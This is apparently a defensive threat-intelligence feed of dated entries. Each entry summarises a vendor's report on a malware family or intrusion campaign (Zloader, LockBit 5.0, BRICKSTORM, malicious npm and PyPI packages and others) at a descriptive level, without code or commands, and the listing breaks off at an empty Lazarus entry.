MEDIUM
Intel Source:
Zscaler
Intel Name:
Zloader_Updated_Version
Date of Scan:
2025-09-28
Impact:
MEDIUM
Summary:
Zscaler researchers have identified a new, advanced variant of the Zloader trojan, a malware family originally derived from Zeus that resurfaced in late 2023. The latest versions not only steal data but also function as an initial-access broker, providing ransomware operators with entry into compromised corporate Windows systems. Zloader employs multiple layers of code obfuscation, performs sandbox checks, and installs itself with lower privileges to remain stealthy. Its C2 communications have also evolved, leveraging custom DNS tunneling with encryption and, in some cases, WebSockets to blend in with normal HTTPS traffic. Configuration data is stored in a compact JSON block that supports flexible DNS resolution, while new commands enable Active Directory reconnaissance to facilitate lateral movement.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-zloader-updates
2025-09-28
YiBackdoor_IcedID_Linked_Windows_Backdoor
MEDIUM
Intel Source:
Zscaler
Intel Name:
YiBackdoor_IcedID_Linked_Windows_Backdoor
Date of Scan:
2025-09-28
Impact:
MEDIUM
Summary:
Researchers at Zscaler ThreatLabz have identified YiBackdoor, a newly emergent Windows malware first seen in June 2025 that re-uses code from the IcedID and Latrodectus families. The backdoor maintains persistence through registry Run keys and injects into a core Windows host process to conceal its presence. After launch, it performs system reconnaissance, captures screenshots, and executes arbitrary CMD or PowerShell tasks delivered over an encrypted HTTP(S) channel secured with daily-rotating TripleDES keys. Basic anti-analysis safeguards—hypervisor checks, API hashing, and on-demand string decryption—help it evade commodity sandboxes. A plugin architecture enables run-time feature expansion, underscoring its role as a modular post-exploitation platform reminiscent of ransomware loaders. Code-reuse overlaps observed by ThreatLabz imply a shared developer or tooling exchange within the IcedID ecosystem.
Source: https://www.zscaler.com/blogs/security-research/yibackdoor-new-malware-family-links-icedid-and-latrodectus
2025-09-27
AI_Based_Credential_Phishing_Campaign
MEDIUM
Intel Source:
Microsoft
Intel Name:
AI_Based_Credential_Phishing_Campaign
Date of Scan:
2025-09-27
Impact:
MEDIUM
Summary:
Microsoft researchers uncovered a phishing campaign that used AI-generated code to hide malicious logic inside SVG file attachments sent through email. The attackers exploited a compromised Microsoft 365 account belonging to a small business and used a self-addressed/BCC trick to bypass basic security filters. When opened in a browser, the SVG executed hidden JavaScript that redirected victims through a CAPTCHA page, collected device fingerprints, and attempted to steal login credentials. Microsoft’s Security Copilot identified that the script used an unusual, business-style coding pattern generated by an LLM, which made it harder for security tools to detect. Although Microsoft Defender for Office 365 blocked the campaign early, a successful compromise could have enabled business email compromise, internal phishing, and data theft.
Source: https://www.microsoft.com/en-us/security/blog/2025/09/24/ai-vs-ai-detecting-an-ai-obfuscated-phishing-campaign/
2025-09-27
A_Evolution_to_PureRAT
HIGH
Intel Source:
Huntress
Intel Name:
A_Evolution_to_PureRAT
Date of Scan:
2025-09-27
Impact:
HIGH
Summary:
Huntress researchers have observed a tactical shift by a Vietnamese threat actor from developing custom Python-based infostealers to deploying the commodity malware known as PureRAT. The campaign begins with spearphishing emails that deliver ZIP archives containing both benign and malicious files, leveraging DLL sideloading and obfuscated Python loaders. The attackers demonstrate strong technical proficiency, chaining multiple staged payloads that transition from Python loaders to compiled .NET malware, ultimately delivering PureRAT. This RAT provides full remote control of compromised systems, including persistence, surveillance via webcams and microphones, keystroke logging, credential and cryptocurrency theft, and data exfiltration over Telegram, linked to the handle @LoneNone and Vietnamese-hosted C2 servers—indicators that align with activity previously associated with PXA Stealer.
Source: https://www.huntress.com/blog/purerat-threat-actor-evolution
2025-09-27
Malicious_Fezbox_NPM_Package
MEDIUM
Intel Source:
Socket
Intel Name:
Malicious_Fezbox_NPM_Package
Date of Scan:
2025-09-27
Impact:
MEDIUM
Summary:
Socket researchers have identified a malicious npm package called Fezbox, published under the alias Jandeu, which embeds a backdoor within its compiled JavaScript code. The package downloads a QR-code image that actually contains an executable payload, which is decoded and executed after a 120-second delay. Once activated, the payload collects usernames and passwords from browser cookies and exfiltrates them to a hard-coded HTTPS server. The attacker employed multiple obfuscation techniques such as string reversal, heavy minification, and QR-code steganography to avoid detection and sandboxing. Because Fezbox is still available in the public registry, any developer who installs it can accidentally bake the backdoor into production code, enabling account takeover and lateral movement across SaaS and corporate systems.
Source: https://socket.dev/blog/malicious-fezbox-npm-package-steals-browser-passwords-from-cookies-via-innovative-qr-code?utm_medium=feed
2025-09-27
Raven_Stealer_Telegram_Credential_Theft
MEDIUM
Intel Source:
Point Wild
Intel Name:
Raven_Stealer_Telegram_Credential_Theft
Date of Scan:
2025-09-27
Impact:
MEDIUM
Summary:
Researchers at Point Wild have observed Raven Stealer, a Delphi/C++ information-stealing malware that exfiltrates browser credentials, cookies, payment details and screenshots through the Telegram Bot API. The malware’s GUI builder embeds operator-supplied Chat ID and Bot Token values into each stub, creating uniquely named payloads that evade signature-based detection (p.5). On launch, the stub decrypts a ChaCha20-protected DLL in memory, spawns a suspended Chromium process and performs reflective hollowing to execute its payload invisibly (p.10). The active implant enumerates Chromium-based browsers, decrypts stored passwords and payment data, stages them under %Local%\RavenStealer, compresses the haul and transmits it via Telegram in near-real time (pp.10-12). Operating entirely in user space, Raven Stealer needs no privilege escalation and leaves few artefacts beyond its loot, hampering post-incident forensics.
Source: https://www.pointwild.com/threat-intelligence/raven-stealer
2025-09-26
LockBit_5_0_Targets_Windows_Linux_and_ESXi
HIGH
Intel Source:
Trend Micro
Intel Name:
LockBit_5_0_Targets_Windows_Linux_and_ESXi
Date of Scan:
2025-09-26
Impact:
HIGH
Summary:
Trend Micro researchers have identified that LockBit has released version 5.0, expanding its ransomware to Windows, Linux, and VMware ESXi systems. The new version retains previous capabilities while introducing stronger obfuscation and anti-forensic measures. On Windows, it employs a packed loader that decrypts the payload directly in memory, complicating static analysis. After encrypting files, it assigns random 16-character extensions, delivers the standard ransom note, patches logging functions, and clears event logs to hinder detection. It avoids execution on systems using Russian language or geolocation. The Linux variant works similarly to the Windows version and generates detailed logs, while the ESXi variant includes virtualization-specific options that allow attackers to impact multiple virtual machines on a single host.
Source: https://www.trendmicro.com/en_us/research/25/i/lockbit-5-targets-windows-linux-esxi.html
2025-09-26
BlockBlasters_Patch_Trojan
HIGH
Intel Source:
G-Data
Intel Name:
BlockBlasters_Patch_Trojan
Date of Scan:
2025-09-26
Impact:
HIGH
Summary:
Researchers at G DATA have discovered that a malicious update for the newly released Steam game BlockBlasters is distributing a Windows-based infostealer and backdoor. The August 30 patch was altered to include a batch script that steals Steam credentials, browser data, and crypto-wallet files, then uploads them to an attacker-controlled server. The update also drops additional payloads through password-protected archives and VBS launchers, including a Python-compiled remote-control tool and a StealC-based credential stealer. To evade detection, the script disables Microsoft Defender scanning for the payload folder and looks for running antivirus processes. The compromised patch has already reached hundreds of players, giving attackers persistent access to affected machines and enabling large-scale credential theft and potential account takeovers.
Source: https://www.gdatasoftware.com/blog/2025/09/38265-steam-blockblasters-game-downloads-malware
2025-09-25
CountLoader_Triple_Variant_Malware_Loader
HIGH
Intel Source:
Silent Push
Intel Name:
CountLoader_Triple_Variant_Malware_Loader
Date of Scan:
2025-09-25
Impact:
HIGH
Summary:
Researchers at Silent Push have identified CountLoader, a newly observed malware loader that is released in three distinct builds (.NET, PowerShell and JScript) to facilitate ransomware operations. The toolset fingerprints infected hosts, establishes encrypted command-and-control channels through rotating infrastructure and then pulls secondary payloads such as Cobalt Strike, AdaptixC2 and HVNC to expand attacker control. It persists by creating a fraudulent Google Update scheduled task alongside a registry Run key, ensuring code retrieval on every reboot. Variant-specific kill-switch logic and bespoke string obfuscation show active development and operator agility. Telemetry in the report links the activity to Russian-language affiliate crews and highlights phishing lures aimed at Windows domain-joined systems as well as individuals in Ukraine.
Source: https://www.silentpush.com/blog/countloader/?utm_source=rss&utm_medium=rss&utm_campaign=countloader
2025-09-25
BRICKSTORM_Backdoor
HIGH
Intel Source:
Google Cloud
Intel Name:
BRICKSTORM_Backdoor
Date of Scan:
2025-09-25
Impact:
HIGH
Summary:
Google researchers have uncovered that the threat actor UNC5221 is conducting a long-running campaign leveraging a customized BRICKSTORM backdoor to maintain covert access within victim environments. The operators achieve initial access by exploiting zero-day vulnerabilities in internet-facing edge appliances and VMware vCenter servers, then move on to credential harvesting and manual lateral movement. Once established, BRICKSTORM operates as a full-featured SOCKS proxy, enabling the attackers to exfiltrate sensitive emails and virtual machine data without raising standard monitoring alerts. The campaign primarily targets U.S. tech firms and law practices, deploying malware that works across Linux, Windows, and VMware systems. Their tactics include escalating to domain administrator privileges, abusing vSphere APIs, and executing malware on devices that often lack security monitoring. If not stopped, this could lead to the theft of valuable intellectual property and sensitive legal communications.
Source: https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign
2025-09-25
RedNovember_Espionage_Campaign
HIGH
Intel Source:
Recorded Future
Intel Name:
RedNovember_Espionage_Campaign
Date of Scan:
2025-09-25
Impact:
HIGH
Summary:
Researchers from Recorded Future have uncovered a cyber-espionage campaign conducted by the Chinese state-sponsored group RedNovember (also known as Storm-2077 and formerly TAG-100). Since mid-2024, the group has been exploiting vulnerabilities in widely used VPNs and network appliances including Ivanti, SonicWall, Cisco, F5, Palo Alto, Sophos, and Fortinet to compromise high-value targets. Once inside, they deploy tools such as the open-source Pantegana backdoor, Cobalt Strike, and SparkRAT, while concealing their activity through commercial VPN services like ExpressVPN. Their victims include government ministries, defense and aerospace contractors, space research centres, law firms, and professional-services firms, with confirmed breaches at U.S. defense contractors, a European engine manufacturer, and several diplomatic organizations. RedNovember’s operations have primarily targeted the U.S., Taiwan, South Korea, and over 30 Panamanian government entities, often aligning with China’s strategic interests. By leveraging off-the-shelf tools and exploiting edge devices, the group has achieved global reach while making attribution more difficult, posing a significant risk of sensitive government and defense data theft.
Source: https://www.recordedfuture.com/research/rednovember-targets-government-defense-and-technology-organizations
2025-09-24
ShadowV2_Botnet
MEDIUM
Intel Source:
Darktrace
Intel Name:
ShadowV2_Botnet
Date of Scan:
2025-09-24
Impact:
MEDIUM
Summary:
Researchers at Darktrace have uncovered ShadowV2, a container-based botnet that operates as a paid service. The malware is distributed by hijacking misconfigured Docker daemons through a Python script, then deploys a Go-based RAT inside new containers to establish persistent control. Its operators manage the botnet via a public REST API that provides full functionality, including user creation and attack orchestration. Once activated, the botnet can launch powerful HTTP flood and HTTP/2 rapid-reset attacks, capable of bypassing protections such as Cloudflare’s under-attack mode. Honeypot analysis shows that the malware rapidly replicates its tools within containers, minimizing forensic artefacts and accelerating propagation. The campaign mainly targets cloud servers with exposed Docker services, indicating largely opportunistic rather than highly targeted attacks.
Source: https://www.darktrace.com/blog/shadowv2-an-emerging-ddos-for-hire-botnet
2025-09-24
OceanLotus_Deploys_Stealthy_Havoc_RAT_Loader
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
OceanLotus_Deploys_Stealthy_Havoc_RAT_Loader
Date of Scan:
2025-09-24
Impact:
MEDIUM
Summary:
Researchers at the 360 Threat Intelligence Center have attributed a recent cyber campaign to APT-C-00, also known as OceanLotus, involving the use of a custom DLL loader to covertly deploy the Havoc remote-access Trojan (RAT). The malware sample, compiled with Mingw-w64 and consistent with OceanLotus tooling, currently evades all antivirus detections. It uses runtime API hashing, creates a mutex to ensure a single instance, and achieves persistence by writing its command line to the HKCU...\Run registry key. The loader then performs module hollowing on certmgr.dll and reflectively injects the Havoc RAT shellcode. Once active, Havoc enables full remote command execution, granting the attacker post-exploitation control and data collection capabilities. These tactics, such as in-memory execution, registry-based persistence, and stealthy deployment, leave minimal forensic traces, significantly raising the risk of credential theft and data exfiltration. While no destructive behavior has been observed, the techniques and tooling align with OceanLotus’s history of targeting government and business entities in East Asia.
Source: https://mp.weixin.qq.com/s/zZVmDDWHQx7XuJZ8YO6joA
2025-09-24
CVE_2024_36401_GeoServer_Compromise
MEDIUM
Intel Source:
CISA
Intel Name:
CVE_2024_36401_GeoServer_Compromise
Date of Scan:
2025-09-24
Impact:
MEDIUM
Summary:
CISA researchers identified that threat actors compromised a U.S. federal civilian executive branch (FCEB) agency by exploiting the remote code execution vulnerability CVE-2024-36401 in two public-facing GeoServer instances. Their objective was to establish persistent access, conduct internal pivoting, and deploy C2 infrastructure. After initial exploitation, the attackers installed the open-source proxy tool Stowaway, deployed web shells and scheduled tasks for persistence, and moved laterally from GeoServer to a Microsoft SQL Server. They also harvested credentials through brute-force techniques and attempted privilege escalation on Linux hosts using the Dirty Cow exploit. The activity remained undetected for nearly three weeks due to gaps in endpoint detection and response (EDR) alert review and the absence of protective controls on the public-facing web server, although no destructive actions or confirmed data exfiltration were observed.
Source: https://www.cisa.gov/sites/default/files/2025-09/AA25_266A_advisory_cisa_shares_lessons_learned_from_ir_engagement.pdf
2025-09-23
BeaverTail_Distributed_with_ClickFix_Lure
MEDIUM
Intel Source:
GitLab
Intel Name:
BeaverTail_Distributed_with_ClickFix_Lure
Date of Scan:
2025-09-23
Impact:
MEDIUM
Summary:
GitLab researchers identified a North Korea–linked campaign that delivers a newly compiled, multi-platform variant of the BeaverTail malware alongside the InvisibleFerret RAT. The threat actor leverages a deceptive ClickFix workflow hosted on cloned recruiting sites and tricks marketing, sales, and crypto-trading targets, as well as developers, into running OS-specific shell commands that retrieve and execute bundled payloads from attacker infrastructure. The self-contained binaries, which run on macOS, Windows, and Linux, exfiltrate browser credentials and cryptocurrency wallet data and deploy InvisibleFerret to provide interactive remote access for further exploitation. The malware incorporates header-based guardrails, string obfuscation, and other techniques that reduce static-detection rates and hinder sandbox and antivirus visibility.
Source: https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/#appendix-indicators-of-compromise
2025-09-23
MuddyWater_Deploys_Custom_Backdoors
HIGH
Intel Source:
Group IB
Intel Name:
MuddyWater_Deploys_Custom_Backdoors
Date of Scan:
2025-09-23
Impact:
HIGH
Summary:
Group-IB researchers report that MuddyWater, also known as Seedworm, has been active since 2017, is believed to be linked to Iran’s Ministry of Intelligence and Security (MOIS), and focuses on espionage and disruptive objectives. Initially, the group used RMM tools in its operations but has recently shifted toward low-volume spearphishing attacks delivering custom malware families such as BugSleep, StealthCache, Phoenix, and the Fo0der loader. Their tactics include PowerShell-based loaders, multi-stage infection chains, and encrypted C2 traffic over non-standard endpoints, often hidden behind cloud services and bulletproof hosting. They target victims in multiple sectors including telecommunications, government, defense, energy, and other critical infrastructure across the Middle East, Europe, and the U.S. The group demonstrates strong capabilities for long-term persistence, data theft, and lateral movement using both custom-built and publicly available tools. They also employ evasion techniques such as delayed execution, multi-stage loaders, and the use of Windows Alternate Data Streams.
Source: https://www.group-ib.com/blog/muddywater-infrastructure-malware/
2025-09-22
Fake_Docs_RMM_Tool_Abuse_for_Access
MEDIUM
Intel Source:
CERT-AGID
Intel Name:
Fake_Docs_RMM_Tool_Abuse_for_Access
Date of Scan:
2025-09-22
Impact:
MEDIUM
Summary:
Researchers at CERT-AGID have identified a phishing campaign leveraging fake document sharing emails to deliver a malicious installer for a legitimate remote management tool. The operation begins with English-language lures redirecting recipients to a fraudulent Microsoft Outlook login page designed to validate and capture email credentials. Upon verification, victims are prompted to download and execute an installer that deploys the PDQConnect agent, granting attackers persistent remote access. The activity is assessed as originating from Initial Access Brokers, whose intent is to harvest credentials and establish footholds for resale to other threat actors. By exploiting free trial registrations of commercial RMM software, adversaries avoid financial barriers and rotate accounts as trials expire, ensuring uninterrupted operations.
Source: https://cert-agid.gov.it/news/campagna-malware-abusa-di-strumenti-di-rmm-legittimi-tramite-falsa-condivisione-di-documenti/
2025-09-22
SilentSync_RAT_Malicious_PyPI_Supply_Chain
MEDIUM
Intel Source:
Zscaler
Intel Name:
SilentSync_RAT_Malicious_PyPI_Supply_Chain
Date of Scan:
2025-09-22
Impact:
MEDIUM
Summary:
Researchers at Zscaler ThreatLabz have identified two typo-squatted Python Package Index (PyPI) libraries named sisaws and secmeasure that clandestinely deliver SilentSync, a custom Python remote-access trojan. The packages masquerade as benign developer utilities and, during installation, execute embedded scripts that fetch and run the malware. Once active, SilentSync establishes persistence, connects to attacker command-and-control infrastructure, and awaits tasks. The trojan supports remote shell access, file and directory exfiltration, screenshot capture, and Chromium or Firefox credential harvesting, granting broad operational control over infected hosts. Although the current infection chain weaponises only the Windows platform, SilentSync contains code for Linux and macOS persistence, indicating plans to expand its reach. Victimology is presently limited to developers and continuous-integration systems that import the malicious libraries, but compromise can cascade to downstream consumers of the affected software.
Source: https://www.zscaler.com/blogs/security-research/malicious-pypi-packages-deliver-silentsync-rat
2025-09-20
New_FileFix_Campaign
MEDIUM
Intel Source:
Acronis
Intel Name:
New_FileFix_Campaign
Date of Scan:
2025-09-20
Impact:
MEDIUM
Summary:
Researchers at Acronis have uncovered a new phishing campaign in which attackers are leveraging FileFix, a variant of the ClickFix social-engineering toolkit, to conduct large-scale credential theft. The operation begins with a fraudulent Facebook Security page that deceives victims into executing a PowerShell command. This command covertly launches a multistage loader concealed within a JPEG image through steganography. The loader progressively unpacks and executes additional payloads, ultimately installing the Stealc infostealer. Stealc is designed to harvest browser credentials, cryptocurrency wallets, gaming accounts, and other sensitive information, which is then exfiltrated to attacker-controlled Bitbucket repositories. To evade detection, the campaign employs advanced obfuscation techniques, including JavaScript and PowerShell manipulation, XOR encoding, and domain generation. Activity has been observed across multiple countries, indicating broad, opportunistic targeting rather than a focus on specific sectors.
Source: https://www.acronis.com/en/tru/posts/filefix-in-the-wild-new-filefix-campaign-goes-beyond-poc-and-leverages-steganography/
2025-09-19
SystemBC_Botnet
MEDIUM
Intel Source:
Lumen
Intel Name:
SystemBC_Botnet
Date of Scan:
2025-09-19
Impact:
MEDIUM
Summary:
Researchers at Black Lotus identified that the SystemBC botnet has grown significantly, now operating more than 80 C2 servers and 1,500 active infected machines each day. The malware installs a SOCKS5 proxy on compromised Windows and Linux systems, enabling attackers to conceal their traffic and deliver additional payloads, often linked to ransomware campaigns where it creates encrypted channels for control and data exfiltration. Most infected hosts are commercial VPS servers, providing the botnet with high-bandwidth, low-noise infrastructure compared to residential devices. The botnet is monetized by reselling proxy bandwidth to spammers and phishers while keeping premium nodes for high-value operations such as credential theft and ransomware distribution. The infrastructure is global, with notable ties to Russian and Vietnamese proxy services.
Source: https://blog.lumen.com/systembc-bringing-the-noise/?utm_source=rss&utm_medium=rss&utm_campaign=systembc-bringing-the-noise
2025-09-19
A_New_Variants_SmokeLoader
MEDIUM
Intel Source:
Zscaler
Intel Name:
A_New_Variants_SmokeLoader
Date of Scan:
2025-09-19
Impact:
MEDIUM
Summary:
Zscaler researchers have identified two new versions of the long-running SmokeLoader malware, named 2025 alpha and 2025. Active since 2011, SmokeLoader is primarily used to install other malware such as trojans, ransomware, and information stealers, while also offering plugins for credential theft, browser hijacking, DDoS attacks, and cryptocurrency mining. The latest versions address longstanding bugs, improve stability, and incorporate advanced evasion techniques, including code obfuscation, virtual machine checks, and on-demand decryption. Version 2025 further updates the communication protocol with its servers, introduces checksums, and modifies scheduled-task and file names, rendering it incompatible with earlier variants. Both versions terminate if a Russian keyboard layout is detected, suggesting ties to Russian-speaking operators. At present, many threat actors continue to use the alpha build due to its compatibility with older systems, but adoption of version 2025 is expected to increase as migration progresses.
Source: https://www.zscaler.com/blogs/security-research/smokeloader-rises-ashes
2025-09-19
BlackLock_RaaS_Cross_Platform_Go_Locker
HIGH
Intel Source:
ASEC
Intel Name:
BlackLock_RaaS_Cross_Platform_Go_Locker
Date of Scan:
2025-09-19
Impact:
HIGH
Summary:
Researchers at ASEC have observed BlackLock, a Russian-language ransomware-as-a-service operation that surfaced in early 2024 after rebranding from El Dorado. The crew aggressively recruits affiliates on underground forums and advertises a Go-written locker capable of running on Windows, Linux and VMware ESXi systems. BlackLock uses the go-smb2 library to traverse network shares, encrypting both local and remote files with XChaCha20 while wrapping keys via ECDH, which greatly complicates decryption. After completing encryption, the malware deletes Volume Shadow Copies through in-memory COM shellcode, blocking straightforward restoration paths. Victim reporting shows compromises across U.S. public agencies, manufacturing, consulting, education, transportation and leisure sectors, with additional incidents in South Korea and Japan.
Source: https://asec.ahnlab.com/en/90175/
2025-09-18
RevengeHotels_VenomRAT_Hits_LatAm_Hospitality
HIGH
Intel Source:
Securelist
Intel Name:
RevengeHotels_VenomRAT_Hits_LatAm_Hospitality
Date of Scan:
2025-09-18
Impact:
HIGH
Summary:
Researchers at Securelist have observed RevengeHotels (aka TA558) launching a refreshed phishing campaign against hospitality targets in Latin America. Invoice- and job-application themed emails deliver JavaScript loaders that appear to be generated by large language-model tools, indicating iterative automation. The loaders invoke staged PowerShell scripts that retrieve and execute VenomRAT completely in memory. VenomRAT grants attackers remote desktop control, credential harvesting, file theft, and USB self-propagation. It also installs ngrok to expose RDP or VNC services through encrypted tunnels, broadening attacker reach. Defensive measures are hampered as the malware disables Windows Defender, terminates analysis utilities, and wipes Windows event logs. Current lures in Portuguese and Spanish suggest an operational expansion from Brazil into Argentina, Mexico, Chile, Costa Rica, Bolivia, and Spain. The operation’s objective remains theft of guest payment-card data and reservation records, directly impacting hotel revenue and customer trust.
Source: https://securelist.com/revengehotels-attacks-with-ai-and-venomrat-across-latin-america/117493/
2025-09-18
Warlock_Ransomware
HIGH
Intel Source:
Sophos
Intel Name:
Warlock_Ransomware
Date of Scan:
2025-09-18
Impact:
HIGH
Summary:
Sophos researchers have identified a new ransomware operation dubbed the Warlock Group, also tracked as GOLD SALEM and Storm-2603. The threat actors target organizations of all sizes across North and South America and Europe, from small businesses and government entities to large enterprises. After exploiting vulnerabilities in platforms such as SharePoint, they deploy a custom Golang backdoor to establish remote control, extract credentials from memory, and move laterally with tools like PsExec and Impacket. The attackers use a “bring-your-own-vulnerable-driver” technique to disable security products, terminating EDR agents before deploying their Warlock ransomware. Adopting a double-extortion model, they both encrypt data and threaten to publish stolen files on a Tor-hosted leak site. Recent underground-forum advertisements seeking exploits and affiliates suggest the group is evolving toward a ransomware-as-a-service model.
Source: https://news.sophos.com/en-us/2025/09/17/gold-salems-warlock-operation-joins-busy-ransomware-landscape/
2025-09-18
XillenStealer_A_Python_InfoStealer
MEDIUM
Intel Source:
Cyfirma
Intel Name:
XillenStealer_A_Python_InfoStealer
Date of Scan:
2025-09-18
Impact:
MEDIUM
Summary:
Researchers from Cyfirma have identified XillenStealer, a new Python-based, open-source information stealer published on GitHub by an author using the alias Bengaminattion. The toolkit includes a builder that allows low-skilled actors to create custom binaries for Windows, Linux, and macOS for distribution. When executed, the malware collects host profile data, injects into explorer.exe to hide its activity, and harvests browser-stored credentials, cryptocurrency wallet keys, Discord tokens, and Telegram session files. Collected data are compressed, split if larger than 45 MB, and automatically exfiltrated to an operator-controlled Telegram bot. The campaign is linked to a Russian-language cyber-criminal ecosystem called Xillen Killers, which also advertises services such as DDoS and exploit offerings. Although XillenStealer is non-destructive, its modular design and public availability make it easy for other actors to weaponize, increasing the risk of widespread credential and crypto theft.
Source: https://www.cyfirma.com/research/unmasking-a-python-stealer-xillenstealer/
2025-09-18
ShinyHunters_Targets_Salesforce_Via_Phishing
LOW
Intel Source:
Reliaquest
Intel Name:
ShinyHunters_Targets_Salesforce_Via_Phishing
Date of Scan:
2025-09-18
Impact:
LOW
Summary:
ReliaQuest researchers have uncovered coordinated ticket-themed phishing campaigns conducted by ShinyHunters, a financially motivated group that re-emerged after about a year of silence and is targeting Salesforce credentials at large enterprises. The group’s recent infrastructure and social-engineering lures closely resemble those of Scattered Spider. Victims are tricked into approving malicious connected apps, enabling large-scale data exfiltration from Salesforce and related cloud repositories. Once inside, attackers move laterally via Citrix, VMware ESXi and VPN appliances, escalate privileges up to Azure Global Administrator and even relocate virtual machines to evade detection. The group is focusing more on finance, insurance and professional-services targets and hides its footprint using Cloudflare-masked nameservers, disposable registrant emails, and VPN obfuscation to complicate attribution and defense.
Source: https://reliaquest.com/blog/threat-spotlight-shinyhunters-data-breach-targets-salesforce-amid-scattered-spider-collaboration/
2025-09-18
Akira_Ransomware_Exploits_SonicWall_VPN
HIGH
Intel Source:
Huntress
Intel Name:
Akira_Ransomware_Exploits_SonicWall_VPN
Date of Scan:
2025-09-18
Impact:
HIGH
Summary:
Huntress researchers discovered that the Akira ransomware group gained access to a company’s network by exploiting a SonicWall VPN device. Once inside, the attackers found a plaintext file on a user’s desktop that contained recovery codes, which they used to impersonate the legitimate account inside the portal. Leveraging this access, the group disabled alerts and uninstalled agents to evade detection. Simultaneously, they executed administrative commands to delete shadow copies across multiple systems, preparing the environment for their ransomware payload. Akira also tampered with certificate stores on a Domain Controller to maintain long-term access. Although the overall damage was contained, the attackers had sufficient control to potentially encrypt or extort the entire organization.
Source: https://www.huntress.com/blog/dangers-of-storing-unencrypted-passwords
2025-09-17
Infostealer_Surge_via_SEO_and_Domain_Abuse
MEDIUM
Intel Source:
ASEC
Intel Name:
Infostealer_Surge_via_SEO_and_Domain_Abuse
Date of Scan:
2025-09-17
Impact:
MEDIUM
Summary:
Researchers at ASEC have observed a surge in infostealer activity throughout August 2025, driven by campaigns distributing LummaC2, ACRStealer, and Rhadamanthys. Threat actors continue to disguise malware as cracks and keygens, relying on SEO poisoning to ensure their content appears prominently in search results. Beyond illicit download sites, actors have expanded to legitimate platforms such as Chromium.org issue trackers, SlideShare, and Slack Marketplace, embedding malicious links into trusted ecosystems that increase the likelihood of user engagement. The report highlights that the vast majority of samples were delivered as executables, while a smaller but notable share leveraged DLL side-loading to bypass defenses by masquerading as legitimate files. ACRStealer demonstrates a particularly concerning evolution, adopting domain masquerade techniques by modifying HTTP headers to mimic legitimate vendor domains and later shifting to more complex subdomains, complicating detection.
Source: https://asec.ahnlab.com/en/90154/
2025-09-17
UNC6040_and_UNC6395_Salesforce_Data_Exfiltration
HIGH
Intel Source:
IC3.gov
Intel Name:
UNC6040_and_UNC6395_Salesforce_Data_Exfiltration
Date of Scan:
2025-09-17
Impact:
HIGH
Summary:
The FBI reports that cyber-criminal groups UNC6040 and UNC6395 are actively breaching organisations’ Salesforce environments to steal large datasets and demand extortion payments. UNC6040 uses vishing techniques against call-center employees to obtain login credentials and MFA codes, then convinces victims to approve a malicious application that gives the attackers direct API access. They use this access to export bulk customer records and later demand cryptocurrency payments, often under the ShinyHunters name. On the other hand, UNC6395 abused OAuth tokens from Salesforce chatbot integrations to maintain long-term access until those tokens were revoked in August 2025. Both groups focus on selling or extorting stolen data rather than disrupting operations, and their methods bypass normal login, MFA, and security monitoring, making detection difficult. The attacks have impacted organizations across multiple industries, exposing sensitive customer data, intellectual property, and communications.
Source: https://www.ic3.gov/CSA/2025/250912.pdf
2025-09-17
NotDoor_Malware
HIGH
Intel Source:
Polyswarm
Intel Name:
NotDoor_Malware
Date of Scan:
2025-09-17
Impact:
HIGH
Summary:
PolySwarm researchers have discovered that the Russian-linked threat group Fancy Bear (APT28) is deploying a new backdoor, NotDoor, through Microsoft Outlook. The attack begins with a malicious VBA macro that leverages DLL side-loading via a legitimate OneDrive.exe binary to load a malicious SSPICLI.dll. Once executed, the malware injects a macro project into the victim’s Outlook profile, ensuring it executes each time Outlook is launched. To evade detection, NotDoor modifies registry settings to automatically enable macros, disables security prompts, and employs obfuscation techniques such as randomized variable names. The backdoor provides attackers with covert capabilities to execute commands, upload files, and exfiltrate data, triggered by specially crafted emails with subjects such as “Daily Report.” It communicates with an attacker-controlled server using encoded PowerShell commands that blend with legitimate traffic. This campaign is targeting multiple sectors across NATO countries, posing significant risks to sensitive government, defense, and critical infrastructure data.
Source: https://blog.polyswarm.io/fancy-bear-uses-notdoor-to-target-nato-countries
2025-09-17
Oyster_Backdoor_via_SEO_Poisoning
HIGH
Intel Source:
Darktrace
Intel Name:
Oyster_Backdoor_via_SEO_Poisoning
Date of Scan:
2025-09-17
Impact:
HIGH
Summary:
Researchers at Darktrace have identified a campaign where threat actors leveraged search engine poisoning to distribute the Oyster backdoor through trojanized PuTTY installers. Oyster, also known as Broomstick or CleanUpLoader, is a C++ malware first seen in 2023 and widely adopted by ransomware groups as an initial access tool. The campaign manipulates search rankings and sponsored ads to lure users into downloading a functional PuTTY client bundled with Oyster, a technique that disproportionately risks IT administrators with elevated privileges. Once installed, the malware establishes persistence through scheduled tasks and DLL side-loading, enabling remote command execution and file transfers.
Source: https://www.darktrace.com/blog/seo-poisoning-and-fake-putty-sites-darktraces-investigation-into-the-oyster-backdoor
2025-09-16
HijackLoader_CAPTCHA_Phishing_Loader_Campaign
HIGH
Intel Source:
Seqrite
Intel Name:
HijackLoader_CAPTCHA_Phishing_Loader_Campaign
Date of Scan:
2025-09-16
Impact:
HIGH
Summary:
Researchers at Seqrite have identified a CAPTCHA-protected phishing campaign that delivers the HijackLoader malware through fake installers, malvertising, and SEO poisoning tactics. The attack starts with a deceptive web page that persuades users to download an HTA file, which functions as the initial downloader. This downloader launches a series of heavily obfuscated PowerShell scripts that decode additional stages while resisting static analysis. The chain culminates in a packed .NET executable that injects a protected DLL into memory to execute the final payload. Throughout the process, the loader employs advanced evasion such as process doppelganging, DLL unhooking, direct syscalls under WOW64, call-stack spoofing, and anti-virtualization checks. On completion, the final stage contacts command-and-control infrastructure to retrieve information-stealing malware such as NekoStealer, enabling credential theft and data exfiltration.
Source: https://www.seqrite.com/blog/deconstructing-a-cyber-deception-an-analysis-of-the-clickfix-hijackloader-phishing-campaign/
2025-09-16
Lazarus_Expands_Attacks_via_Dev_and_Supply_Chains
HIGH
Intel Source:
ANY.RUN
Intel Name:
Lazarus_Expands_Attacks_via_Dev_and_Supply_Chains
Date of Scan:
2025-09-16
Impact:
HIGH
Summary:
